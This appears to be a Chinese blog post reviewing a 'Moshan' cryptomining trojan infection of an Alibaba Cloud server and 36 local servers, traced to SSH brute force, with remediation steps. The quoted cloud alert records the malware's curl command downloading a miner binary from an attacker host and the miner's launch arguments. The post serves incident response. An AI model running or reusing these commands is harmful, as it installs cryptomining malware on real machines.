服务器中了“魔铲”挖矿病毒复盘
00 分钟
2023-7-31
2023-10-19
type
status
date
slug
summary
tags
category
icon
password
URL
2023年7月31日收到阿里云“【挖矿处置通知】为避免您的云服务被关停,请尽快清理挖矿活动”邮件提醒,有一台阿里云服务器存在挖矿活动,经过2天排查,确认病毒是“魔铲”挖矿木马,并且该病毒感染了所有公司本地服务器(36台),该病毒的主要特点是利用机器的CPU去挖矿,CPU占用率达到100%,导致其他服务不可用。通过top可以看到占用CPU的程序名称是-bash

阿里云给出的站内信通知:

2023-07-31 16:33:10 详情 被写入的文件路径: /var/tmp/-bash 操作文件的进程ID: 1715 操作文件的进程路径: /usr/bin/curl 操作文件的进程命令行参数: curl --fail --silent --connect-timeout 5 --max-time 10 --retry 1 -o -bash http://pw.pwndns.pw/miners/x86_64 操作文件的进程链路: -[1435] /sbin/lntpdate -[1444] sh -s uc -[1715] curl --fail --silent --connect-timeout 5 --max-time 10 --retry 1 -o -bash https://pw.pwndns.pw/miners/x86_64 用户名: root 命令行: ./-bash -c -k -dp 443 -tls -p 443 -tls -dp 3333 -p 3333 -d 进程路径: /var/tmp/-bash 进程ID: 1775 父进程命令行: sh -s uc 父进程文件路径: /usr/bin/bash 父进程ID: 1444 进程链: -[1435] /sbin/lntpdate -[1444] sh -s uc -[1775] ./-bash -c -k -dp 443 -tls -p 443 -tls -dp 3333 -p 3333 -d 提示: 检测到可疑的文件植入行为,该文件被写入磁盘并被执行 描述: 检测到可疑的文件植入行为,该文件被写入磁盘并被执行。攻击者在利用漏洞获取主机权限后,通常会从外部植入文件以便于进一步的攻击渗透。 处置建议: 1.验证告警的准确性 a)检查告警中的内容。在互联网或威胁情报平台上搜索。 b)联系该设备所有者,验证该活动是否合法。 c)查看该设备是否还有其他类型的告警。交叉验证告警准确性。 d)使用“告警溯源”、“日志分析”功能,深入调查告警。 2.阻止或缓解恶意行为造成的影响。您可以隔离可疑文件、停止可疑进程、隔离受影响的机器、停用受感染的帐户或重置密码、阻止 IP 地址和 URL,并安装安全更新。 3.调查告警消除根因。执行漏洞扫描、基线检查,查找已知的弱点并进行修复。 4.联系您的安全事件响应团队,或者购买第三方应急响应服务,例如安全管家协助进行处理

被攻击的原因:

账号被暴力破解
notion image

解决方案:

1、现在已经将阿里云和本地服务器杀毒,并观察1天,并无残留病毒
杀毒脚本如下:
2、所有服务器禁止密码登录 3、使用安全软件扫描服务器,查看是否存在漏洞(Nessus、OpenVAS)
4、ssh端口指定IP可以登录

评论